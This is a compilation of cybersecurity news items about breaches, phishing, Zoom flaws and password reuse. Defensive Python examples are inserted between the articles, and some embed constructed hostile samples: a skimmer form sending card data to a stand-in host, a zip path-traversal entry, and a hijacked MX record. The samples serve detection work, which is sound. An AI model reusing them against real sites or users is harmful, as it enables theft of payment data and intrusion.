Data Breach: Canada’s Fitness Depot Blames ISP for Security Incident

As Covid-19 spread across the world, opportunities to exercise outdoors became limited for most people. Workout routines quickly shifted online, and with gyms now closed, online sales of fitness equipment skyrocketed 55% between January and March 2020.

The newest addition to the data breach ‘wall of shame’ is none other than Fitness Depot, Canada’s largest fitness equipment retailer. Recently, the company started informing its customer database about a security incident that led to the exposure of customers’ names, home addresses, email addresses, telephone numbers, and numbers of credit cards used in transactions.

“Cyber criminals may have accessed and or removed personal information relating to certain individuals who made purchases for delivery and or who made purchases for in-store pick up at one of our retail locations,” Fitness Depot said in a data breach notification letter sent to affected shoppers.

The data breach, dating back to February 18, began with the injection of a malicious form on the company website, a clear sign of a Magecart-style attack. Web skimming attacks are designed to steal payment and personal information.

“Cyber criminals were able to place a form on our Fitness Depot website that was misleading,” the company said. “Once our customers were redirected to this form the customer information was copied without the authorization or knowledge of Fitness Depot. This is how the personal information was captured and stolen.”
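A defender-side check for the kind of injected form described above, written as an added example (not code from the article or from Fitness Depot): it parses a checkout page and flags any form that posts to, or script that loads from, a host outside the site's allowlist. The page, the hostnames and the allowlist are all constructed sample data.

```python
"""Flag forms and scripts on a page whose origin is not allowlisted.
A skimmer injected into a checkout page typically ships the captured
fields to a host the shop does not control; this check surfaces it."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page: the first form is the shop's own checkout form,
# the second (injected) form posts card data to an unrelated host.
SAMPLE_HTML = """
<html><body>
<script src="https://shop.example/static/checkout.js"></script>
<form action="/checkout/submit" method="post">
  <input name="card"><input name="name">
</form>
<form action="https://cdn-stats.example.net/collect" method="post">
  <input name="card"><input name="cvv">
</form>
<script src="https://cdn-stats.example.net/s.js"></script>
</body></html>
"""

ALLOWED_HOSTS = {"shop.example"}  # constructed allowlist for this site


class OriginCollector(HTMLParser):
    """Collect every host a <form> posts to and every host a <script> loads from."""

    def __init__(self):
        super().__init__()
        self.findings = []  # list of (tag, raw_url)

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and a.get("action"):
            self.findings.append(("form", a["action"]))
        elif tag == "script" and a.get("src"):
            self.findings.append(("script", a["src"]))


def host_of(url, page_host):
    """Relative URLs (no netloc) resolve to the page's own host."""
    return (urlparse(url).netloc or page_host).lower()


def find_suspicious_origins(html, page_host, allowed):
    """Return (tag, url) pairs whose target host is not on the allowlist."""
    collector = OriginCollector()
    collector.feed(html)
    return [(tag, url) for tag, url in collector.findings
            if host_of(url, page_host) not in allowed]


if __name__ == "__main__":
    for tag, url in find_suspicious_origins(SAMPLE_HTML, "shop.example", ALLOWED_HOSTS):
        print(f"ALERT: <{tag}> sends or loads data via non-allowlisted origin: {url}")
```

The same allowlist expressed as a Content-Security-Policy `form-action` and `script-src` directive would have stopped the injected form from submitting at all, which is the preventive control; this script is the after-the-fact audit.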

It took the company just over 3 months to discover the incident, as their notification clearly points out.

“On May 22nd, 2020 Fitness Depot was informed of a potential data breach on transactions involving our Ecommerce operations. Fitness Depot immediately shut down this service and launched an investigation,” the letter reads.

The vendor is now pointing fingers at its Internet Service Provider (ISP), which apparently “neglected to activate the anti-virus software” on their account. While that statement leaves plenty of room for debate, additional questions regarding the number of impacted customers and potential assistance for affected customers remain — no credit monitoring services were provided for shoppers. The company warns of potential fraud and identity theft incidents, and advises customers to review account statements regularly.

“As of this writing of this notification, Fitness Depot has no knowledge that any of our customer information was compromised in any manner,” the company said. “If you feel that your personal customer information was in fact compromised in any way, please let us know immediately.”

The retailer also mentioned that their security measures have now removed the cyber thieves’ access to their online systems, but said they will continue to monitor for any signs of unauthorized activity on their e-commerce platform.

As the world switched to even more online shopping, cybercriminals were not on holiday. They quickly exploited the uptick in e-commerce, deploying targeted attacks on multiple platforms to steal personal and financial information of customers. No stone was left unturned, and cybercrime continues to flourish in the underbelly created by the coronavirus pandemic.

Hackers Use VPN Impersonation in Phishing Emails to Steal Office 365 Credentials

A phishing attack is using VPN impersonation to trick
people into revealing their Microsoft Office 365 credentials.

With so many people working from home, VPN use has
increased considerably. Most companies rely on this sort of technology to let employees
connect to the corporate infrastructure safely, so it stands to reason that bad
actors would seek to use it as an attack vector.

Microsoft Office 365 credentials are highly valued on the dark web because, in the right circumstances, they can give attackers a way into a company’s network that doesn’t require too much effort. Defense systems would have a hard time identifying a hacker who’s using legitimate credentials.

“The attack impersonates a notification email from the IT support at the recipients’ company,” reads the advisory from Abnormal Security.

“The sender email address is spoofed to impersonate the
domain of the targets’ respective organizations. The link provided in the email
allegedly directs to a new VPN configuration for home access. Though the link
appears to be related to the target’s company, the hyperlink actually directs
to an Office 365 credential phishing website,” the advisory continues.

While the attack seems to originate from numerous IPs and
different senders, the payload in each email was identical, which means they’re
all part of the same campaign.

According to the researchers, the phishing landing page is hosted on the Microsoft .NET platform and is identical to the Office 365 login website. Since it’s hosted on a Microsoft platform, the certificate is also legitimate.

As usual, people should not open emails from unknown
senders, and they should be wary of any messages requesting changes of
passwords, confirmation of credentials, or anything else that might lead to a
leak of secure login credentials.

UK Ministry of Defence Launches Its First Specialized Cyber Regiment

Recent spikes in cyber-attacks have provoked heated reaction from governments around the world. Nation-state hackers are targeting medical facilities, government agencies and critical infrastructure in their attempts to disrupt business operations, gain intelligence and inflict revenue losses.

Our increased dependency on cyberspace has brought new risks, and the evolution of the threat landscape has become more dangerous.

In an attempt to protect critical systems and networks of the Royal Navy and Air Force, the UK Armed Forces have just announced the launch of a specialized Cyber Regiment, formally christened at a ceremony in Blandford on June 1.

“As the character of warfare evolves, and the weapons used to fight those wars shift from the industrial to the information age, digital and cyber capabilities are increasingly relied upon to ensure the nation’s security and the safety of our personnel overseas,” reads the Ministry of Defence (MoD) press release.

As part of the Army’s push to improve its response to the surge of digital threats, the 13th Signal Regiment consists of 250 men and women dedicated to the UK’s defensive cyber capabilities.

“The regiment will consist of several Cyber Protection Teams as well as technical staff who will secure the cyber domain for troops deployed on military operations,” said MoD officials.

The MoD pledged an investment of over £22 million in the center that will house the new cyber unit, with “personnel from 15 different cap badges represented in the first intake, plus specialist Royal Navy and RAF personnel.”

“This is a step-change in the modernisation of the UK Armed Forces for information warfare,” Defence Secretary Ben Wallace said. “Cyber-attacks are every bit as deadly as those faced on the physical battlefield, so we must prepare to defend ourselves from all those who would do us harm and 13th Signal Regiment is a vital addition to that defence.”

It’s become vital for governments to step up their game in cyber-warfare, and the recent launch of the specialized regiment is expected to safeguard crucial military infrastructure against digital threats that could potentially cripple military operations and leak sensitive data.

Healthcare Remained the Most Breached Industry in Q1, Research Shows

Cybercriminals
exposed more than 5 billion records in 2019, costing US organizations over $1.2
trillion, according to a new report. Healthcare was the most targeted industry last
year and remains an active target in 2020, accounting for 51% of incidents in
Q1 – likely fueled by the COVID-19 pandemic.

Researchers are noticing a sharp increase in costs related to data breaches. While the 2.8 billion records exposed in 2018 cost organizations more than $654 billion, the over 5 billion records exposed in 2019 cost $1.2 trillion. This lifts the total cost from data breaches to over $1.8 trillion in two years, according to digital identity firm ForgeRock.

Breaches
have increased dramatically, both in actual numbers and costs, with healthcare
emerging as the most targeted industry in 2019, accounting for 382 breaches and
over $2.45 billion in costs. Medical records were the most sought-after type of
PII in Q1 2020, accounting for 25% of all exposed data. These findings are
consistent with other reports tracking attacks on healthcare institutions.

A CBC Canada report revealed this week that medical records can fetch up to $200 on the dark web as they give malicious actors immense leverage in fraud campaigns. One expert cited in the CBC piece opined that healthcare in Canada is 20 years behind banks when it comes to cyber-hygiene. ForgeRock researchers further note that technology firms had the highest number of records compromised by breaches, with over 1.37 billion exposed.

According to
the report, unauthorized access was the most common attack vector used in 2019,
responsible for 40% of breaches, followed by ransomware and malware at 15% and
phishing at 14%.

Personally identifiable information (PII), as defined by new legislation such as GDPR, remained the data most targeted by attackers and was exposed in 98% of 2019 breaches, up from 97% in 2018.

“By
targeting PII and leveraging unauthorized access, cybercriminals highlight how
weaknesses in enterprises’ identity and access management practices
increasingly allow for greater volumes and more sensitive types of data to be
pilfered,” researchers stressed.

Banking/insurance/financial
came second after healthcare, accounting for 12% of all breaches. Education
followed, at 7%, then government and retail, each with a 5% share.

Researchers
say 2020 is set to outpace last year in terms of records breached, even though
the number of individual incidents has dropped by 57%. And healthcare breaches
will likely dominate, driven by fraudulent COVID-19 campaigns geared towards
medical institutions and unwary members of the public.

Bitdefender’s own researchers in Q1 2020 found that the number of global cyberattacks targeting hospitals in March increased by almost 60% from February. According to our data over the past 12 months, this marked the highest spike in our global evolution of cyberattacks detected at hospitals.

A Couple of Critical Zoom Chat Vulnerabilities Found and Fixed

Security researchers found a couple of vulnerabilities
affecting the chat features of the popular video conferencing app Zoom that, if
exploited, would have let attackers achieve arbitrary code execution.

While the mere mention of Zoom makes people think of
video conferencing, the application has a number of other features that can harbor
vulnerabilities. In fact, a couple of critical flaws were identified by Cisco
researchers in the Chat feature; either would have been enough to give
attackers a way to execute code remotely.

The first one, tracked as CVE-2020-6109, is an exploitable path traversal vulnerability affecting how the application processes animated GIFs.

“Only Giphy servers were originally supposed to be
used for this feature in Zoom,” reads the advisory.
“However, the content from an arbitrary server would be loaded in this
case, which could be abused to further leak information or abuse other
vulnerabilities.”

The second was an exploitable path traversal
vulnerability that affected how code snippets are shared by generating a
special zip archive.

“Zoom’s chat functionality is built on top of XMPP
standard with additional extensions to support rich user experience,” say the
researchers. “One of those extensions supports a feature of including source
code snippets that have full syntax highlighting support. The feature to send
code snippets requires installation of an additional plugin, but receiving them
does not.”

The vulnerabilities affected the Zoom Client version
4.6.10. A patch correcting the problems has been issued already.
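The second flaw above is a path traversal through archive entry names. The following is an added example of the defensive pattern (not Zoom's code and not from the Cisco advisory): a receiver unpacks a snippet archive only after checking that every entry resolves to a path inside the destination directory. The archive contents are constructed sample data.

```python
"""Extract a zip archive while refusing entries that escape the destination.
A malicious archive can carry names like ``../../.bashrc``; without the check,
a naive extractor writes outside the directory it was given."""
import io
import os
import tempfile
import zipfile


def build_sample_archive() -> bytes:
    """Constructed archive: one legitimate snippet and one traversal entry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("snippet/main.py", "print('hello')\n")
        zf.writestr("../../.bashrc", "echo this would land in the home directory\n")
    return buf.getvalue()


def is_safe_member(name: str, dest: str) -> bool:
    """True only if `name`, joined to `dest` and normalised, stays inside `dest`."""
    if os.path.isabs(name) or name.startswith(("/", "\\")):
        return False
    root = os.path.realpath(dest)
    target = os.path.realpath(os.path.join(root, name))
    # commonpath collapses any ../ components, so a traversal shows up here
    return os.path.commonpath([root, target]) == root


def safe_extract(data: bytes, dest: str):
    """Extract accepted entries; return (extracted_names, rejected_names)."""
    extracted, rejected = [], []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if not is_safe_member(info.filename, dest):
                rejected.append(info.filename)
                continue
            zf.extract(info, dest)
            extracted.append(info.filename)
    return extracted, rejected


def demo():
    """Run safe_extract on the constructed archive inside a scratch directory."""
    with tempfile.TemporaryDirectory() as dest:
        return safe_extract(build_sample_archive(), dest)


if __name__ == "__main__":
    ok, bad = demo()
    print("extracted:", ok)
    print("rejected:", bad)
```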

The company also announced
a new policy when it comes to encrypting sessions, explaining that, basically,
end-to-end encryption will be a feature available for paid accounts, companies,
and educational entities using the platform.

The company determined that most of the abuse, such as
zoom-bombing, for example, comes from users with free accounts. By not
providing them with complete end-to-end encryption, it makes it easier for law
enforcement and their own teams to investigate any incidents.

Most Victims Choose a Similar or Weaker Password after a Data Breach, Study Finds

Researchers from Carnegie Mellon University published a
paper about people’s behavior after their passwords were compromised in a data
breach, and the results are as bad as you can imagine.

One thing that becomes painfully obvious, especially for cybersecurity companies, is people’s unrivalled complacency when it comes to password management. A robust security solution can be undone by a single user who decides to keep using the one password shared by all of their active online accounts.

The study looked at the effectiveness of password-related breach notifications and the practices people follow after a breach. The most significant difference from earlier work is that this is not a survey, which means the data should be more valuable and precise: actual password data from 249 participants was used to check how people changed their passwords following a breach.

Out of 249 participants, 63 had accounts on breached
domains. Only 33% of the 63 went on to change their passwords, and only 13% did
so within three months of the announcement. Furthermore, most of them used
similar or even weaker passwords.

Also, 21 of the 63 people affected changed passwords
immediately after the breach announcement, but the quality of the new passwords
left much to be desired. The same people also had, on average, 30 other
passwords that were similar to the breached password.

Over the course of two years, 223 of the 249 participants
changed their passwords, and 70% of these password changes resulted in passwords
that were weaker or no stronger.

“Even when they changed their password on a breached
domain, most participants changed them to weaker or equally strong
passwords,” states the study.
“And, regardless of whether participants changed their similar passwords within a month of the first change, their new passwords on the breached domains were on average more similar to their remaining passwords,” the study continues.

The study concludes that password breach notifications
are failing dramatically. They don’t seem to prompt people to change passwords
in sufficient numbers, and the ones that do choose similar passwords.
Regulators should incentivize companies to use multi-factor authentication and
to hash and salt passwords to avoid credential-stuffing and rainbow-table
attacks on plaintext.
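The study's finding is that people replace a breached password with a near copy of it. As an added example (not from the CMU paper), here is a password-change handler that rejects a new password that is only a trivial edit of the old one (case change, appended year or symbol, leetspeak substitutions) and stores the accepted one as a salted PBKDF2 hash, the hashing practice the article calls for. The iteration count and similarity threshold are assumptions to tune per deployment.

```python
"""Reject near-duplicate password changes and store passwords salted+hashed."""
import difflib
import hashlib
import hmac
import secrets
from typing import Optional, Tuple

PBKDF2_ROUNDS = 600_000   # assumption: adjust to your hardware budget
SIMILARITY_THRESHOLD = 0.8  # assumption: ratio above which passwords count as "the same"
TRAILING_JUNK = "0123456789!@#$%^&*.?-_"


def normalise(pw: str) -> str:
    """Collapse the edits people typically make: case, trailing digits/symbols, leetspeak."""
    core = pw.lower().rstrip(TRAILING_JUNK) or pw.lower()  # all-digit passwords keep their body
    return core.translate(str.maketrans("@$!103", "asiloe"))


def too_similar(old: str, new: str) -> bool:
    """True if the new password shares the old one's core after normalisation."""
    a, b = normalise(old), normalise(new)
    if a == b or a in b or b in a:
        return True
    return difflib.SequenceMatcher(None, a, b).ratio() >= SIMILARITY_THRESHOLD


def hash_password(pw: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Return (salt, digest); a fresh 16-byte random salt per password."""
    salt = salt or secrets.token_bytes(16)
    return salt, hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, PBKDF2_ROUNDS)


def verify_password(pw: str, salt: bytes, digest: bytes) -> bool:
    candidate = hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, PBKDF2_ROUNDS)
    return hmac.compare_digest(candidate, digest)  # constant-time comparison


def change_password(old_pw: str, new_pw: str, stored: Tuple[bytes, bytes]):
    """Return (accepted, reason, stored_record); the record only changes on success."""
    salt, digest = stored
    if not verify_password(old_pw, salt, digest):
        return False, "current password incorrect", stored
    if len(new_pw) < 12:
        return False, "new password too short", stored
    if too_similar(old_pw, new_pw):
        return False, "new password too similar to the old one", stored
    return True, "ok", hash_password(new_pw)


if __name__ == "__main__":
    record = hash_password("Winter2019!")              # constructed old password
    for candidate in ("Winter2020!!", "correct horse battery"):
        accepted, reason, record = change_password("Winter2019!", candidate, record)
        print(f"{candidate!r}: {accepted} ({reason})")
```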

Coincheck cryptocurrency exchange targeted by hackers, customer emails exposed

Japanese cryptocurrency exchange Coincheck has announced that earlier this week hackers managed to access some emails sent to the firm by its customers.

Reading (with a little help from Google Translate) the press announcement, it appears an attacker accessed the DNS records for the coincheck.com domain at the firm’s third-party domain registrar, and was able to change the records to forward incoming emails to the hackers.

As a result of this event, some emails the cryptocurrency exchange received between May 31 and June 1 could be illegally accessed by an unauthorised party. Clearly such emails would contain the sender’s email address (which could later be abused by criminals), but Coincheck warned that they could also include the following personal information:

  • Name
  • Registered address
  • Date of birth
  • Phone number
  • ID Selfie

In all, the cryptocurrency exchange believes that around 200 customers had their emails exposed by the incident.

Coincheck says that the domain records have now been amended, and says it has asked its domain registrar to investigate what went wrong, and how a hacker might have been able to access the account.
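The redirection described above works by altering a domain's mail (MX) records at the registrar. The following is an added example of a drift check a domain owner can run (not Coincheck's tooling): it parses `dig +noall +answer`-style output for MX and NS records and reports anything that differs from a signed-off baseline, calling out an added MX whose preference value would make it the preferred mail destination. The domain names and records are constructed placeholders; fetching live answers (for instance with dnspython) is left as an assumption outside the block.

```python
"""Report drift between a domain's baseline MX/NS records and observed answers."""
from dataclasses import dataclass
from typing import List, Optional, Set


@dataclass(frozen=True)
class Record:
    rtype: str                      # "MX" or "NS"
    value: str                      # target host, lowercased, no trailing dot
    priority: Optional[int] = None  # MX preference; lower is tried first


def parse_answers(lines: List[str]) -> Set[Record]:
    """Parse lines of the form: name ttl class type rdata (dig +noall +answer)."""
    records = set()
    for line in lines:
        parts = line.split()
        if len(parts) < 5 or parts[2].upper() != "IN":
            continue
        rtype, rdata = parts[3].upper(), parts[4:]
        if rtype == "MX" and len(rdata) == 2:
            records.add(Record("MX", rdata[1].lower().rstrip("."), int(rdata[0])))
        elif rtype == "NS":
            records.add(Record("NS", rdata[0].lower().rstrip(".")))
    return records


def drift_alerts(expected: Set[Record], observed: Set[Record]) -> List[str]:
    """Alerts for records added to or missing from the baseline, MX preference aware."""
    key = lambda r: (r.rtype, r.value, r.priority or 0)
    best_expected_mx = min((r.priority for r in expected if r.rtype == "MX"), default=None)
    alerts = []
    for r in sorted(observed - expected, key=key):
        msg = f"UNEXPECTED {r.rtype} record: {r.value}"
        if r.rtype == "MX" and best_expected_mx is not None and r.priority < best_expected_mx:
            msg += (f" (preference {r.priority} beats baseline {best_expected_mx}:"
                    " inbound mail would be delivered there first)")
        alerts.append(msg)
    for r in sorted(expected - observed, key=key):
        alerts.append(f"MISSING {r.rtype} record: {r.value}")
    return alerts


# Constructed baseline, as recorded when the zone was last reviewed.
BASELINE = parse_answers([
    "victim.example. 300 IN MX 10 mail.victim.example.",
    "victim.example. 300 IN NS ns1.registrar.example.",
    "victim.example. 300 IN NS ns2.registrar.example.",
])

# Constructed "live" answers after a registrar-account compromise: the original
# MX is still there, but a lower-preference MX now points somewhere else.
OBSERVED = parse_answers([
    "victim.example. 300 IN MX 10 mail.victim.example.",
    "victim.example. 300 IN MX 5 mx.attacker.invalid.",
    "victim.example. 300 IN NS ns1.registrar.example.",
    "victim.example. 300 IN NS ns2.registrar.example.",
])

if __name__ == "__main__":
    for alert in drift_alerts(BASELINE, OBSERVED) or ["no drift detected"]:
        print(alert)
```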

The question I would be asking is whether Coincheck was using a unique, hard-to-crack password to secure its account at the domain registrar. But even a good strong password can still be phished.

For that reason I would like to believe that Coincheck was further securing its domain registrar account (and the critical DNS records it manages) with two-factor authentication.

Unfortunately, not all domain registrars support 2FA – something which has caught out companies in the past.

Past victims of DNS hacking have included WhatsApp, Lenovo, and Bitcoin wallet service Blockchain.info.

Coincheck itself is no stranger to being on the receiving end of unwanted attention from hackers. In January 2018 the cryptocurrency exchange suffered a massive hack which saw it lose more than $500 million worth of digital coins.

Healthcare Is 20 Years Behind Banks on Cybersecurity in Canada, Experts Say

Hospitals
and clinics in Canada can’t cope with growing cyber threats amid the COVID-19
pandemic, say healthcare and cybersecurity professionals. The reason?
Healthcare institutions spend a bare minimum on IT, putting every dollar to
front-line care services. Criminals know this – and are increasingly exploiting
it.

A CBC Canada report reveals that the country’s health system has been under siege from cybercriminals trying to steal patient information and other data in recent years.

The report
highlights several recent incidents, including last year’s hit on LifeLabs, a
Canadian diagnostic and specialty testing company, ransomware attacks on three
Ontario hospitals in October, the hack of eHealth Saskatchewan earlier this
year, and an incident at a medical center in Nova Scotia that exposed
personally identifiable information about surgeries.

With
cybersecurity incidents growing in number, the federal government’s Canadian
Centre for Cybersecurity warned health organizations involved in the national
response to COVID-19 to watch out for cyber-attacks, including ransomware and “sophisticated
threat actors” that may try to steal intellectual property related to
COVID-19 research and development.

Even if they
take the alert seriously, medical institutions have a very big problem on their
hands: no money to hire skilled IT personnel or to buy cyber-safeguards. All
while medical records fetch up to $200 on the dark web because they give
malicious actors immense leverage in fraud campaigns.

The CBC report
aggregates expert opinions, including one from Raheel Qureshi, co-founder of a
cybersecurity consulting firm that deals with hundreds of health organizations across
the country. Qureshi says the healthcare sector is targeted more than any other
industry in Canada, accounting for 48 per cent of all security breaches in the
country last year. Most notably, he had the following to say about hospitals in
the context of cybersecurity:

“A lot
of health-care organizations are still in the middle of some kind of security
road map, or they’re starting the conversation now to understand, ‘What do we
need to do?’ Banks started doing this 15, 20 years ago.”

And it’s
true. A hospital is the last place you’ll find a team of IT gurus trained in
cybersecurity matters, yet hospitals need these resources now more than ever.

And it’s not
just Canada that needs to up the ante in the cybersecurity department. Hospitals
and healthcare facilities around the world are prime targets of a wave of
cyberattacks, including ransomware attacks, Bitdefender telemetry shows.

We’ve also seen the number of cyberattacks and ransomware incidents directly targeting healthcare increase significantly over the past couple of months. For instance, the number of global cyberattacks targeting hospitals in March increased by almost 60 percent from February, marking the highest spike in our global evolution of cyberattacks detected at hospitals over the past 12 months. Learn more in the Bitdefender Labs research, “Global Ransomware and Cyberattacks on Healthcare Spike during Pandemic.”

Abandoned Mobile Apps Are a Security Problem, Research Finds

Mobile apps dropped by developers and removed from
official stores remain a security issue because many people continue to use
them daily, according to new research from Wandera.

Not all mobile apps are around forever. Popular and
useful apps disappear from official stores all the time. The reasons are not
always the same; developers drop support, companies go under, and so on. Even
if an app is removed from the store, though, it’s not necessarily removed from
the phone. Developers don’t have the power (nor should they) to remove apps
remotely.

People will continue to use apps until they don’t work,
especially if they are useful. In this case, security becomes a significant
problem as applications with vulnerabilities remain in use long after they’ve
been retired.

A report from Wandera shows that Productivity apps are the most commonly abandoned, accounting for 38.7% of the total. Next come Gaming and Entertainment (30.3%), Lifestyle (14.1%), Video and Photo (10.6%), and Communication (6.3%).

You might be inclined to believe large companies don’t
abandon their apps, but that’s not the case. In fact, some of the most prolific
apps that have long been absent from official stores but are still in use come
from major companies.

Some of the best-known examples include Samsung Keyboard, SideSync, S Note, Google Now Launcher, and ES File Explorer. Not everyone is quick to replace an old phone, so people have no incentive to replace an app that still works, not knowing that they might be exposing themselves to online risks.

As the report underlines, the most relevant example is
the Samsung Keyboard, which has at least one known vulnerability. Users need to
be aware that not all of their applications are still supported, and they should
always install a security solution that might help mitigate some of the
problems that might arise.

Joomla Open-Source CMS Affected by Data Breach

A data breach affecting Joomla, the popular open-source
content management system (CMS), was announced by its developers from Open
Source Matters.

While some data breaches take place when bad actors exploit vulnerabilities or mount cyberattacks, that’s not always the case. Human error is quite often the cause, as it was in the latest Joomla data breach.

An investigation is still underway, but it looks like the
data breach took place due to improper cybersecurity hygiene. The Joomla
developers posted all the information they had about the incident, including
details of the compromised data.

“JRD full site backups (unencrypted) were stored in a
third-party company Amazon Web Services S3 bucket,” reads the statement
from the developers.

“The third-party company is owned by a former Team
Leader, still Member of the JRD team at the time of the breach,” it said. “Each
backup copy included a full copy of the website, including all the data. Most
of the data was public, since users submitted their data with the intent of
being included into a public directory. Private data (unpublished, unapproved
listings, tickets) was included in the breach.”

The incident was discovered during a security audit that
also revealed the presence of Super User accounts owned by individuals outside
Open Source Matters.

A total of 2,700 people were affected by the data breach.
The leaked information included the full name, the business address, business
phone number, the company URL, the type of business, the encrypted passwords (hashed),
the IP address, and the new subscription preferences.

It’s still unclear whether the data was just exposed,
without being accessed by third parties. In any case, all users of Joomla
Resources Directory are advised to change their passwords as soon as possible,
especially since it’s possible that the same combination of credentials might
have been used on other online services as well.
